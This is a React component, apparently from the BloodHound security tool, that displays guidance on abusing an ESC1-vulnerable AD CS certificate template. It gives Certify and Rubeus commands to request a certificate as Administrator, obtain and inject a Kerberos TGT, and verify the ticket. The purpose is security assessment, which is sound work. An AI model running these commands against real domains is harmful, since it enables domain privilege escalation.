// Copyright 2023 Specter Ops, Inc.
//
// Licensed under the Apache License, Version 2.0
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// SPDX-License-Identifier: Apache-2.0

import { Typography } from '@mui/material';
import { FC } from 'react';

const WindowsAbuse: FC = () => {
    return (
        <>
            <Typography variant='body2'>An attacker may perform this attack in the following steps:</Typography>
            <Typography variant='body2'>
                <b>Step 1</b>: Use Certify (2.0) to request enrollment in the affected template, specifying the affected
                certification authority and target principal to impersonate:
            </Typography>
            <Typography component={'pre'}>
                {
                    'Certify.exe request --ca rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA --template ESC1 --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500'
                }
            </Typography>
            <Typography variant='body2'>
                The certificate PFX is printed to the console in a base64-encoded format.
            </Typography>
            <Typography variant='body2'>
                <b>Step 2</b>: With Rubeus, use the certificate to authenticate to the domain and request a TGT,
                specifying the identity you intend to impersonate:
            </Typography>
            <Typography component={'pre'}>
                {'Rubeus asktgt /user:Administrator /domain:forestroot.com /certificate:<cert base64> /ptt'}
            </Typography>
            <Typography variant='body2'>
                <b>Step 3</b>: Optionally verify the TGT by listing it with the klist command:
            </Typography>
            <Typography component={'pre'}>{'klist'}</Typography>
        </>
    );
};

export default WindowsAbuse;
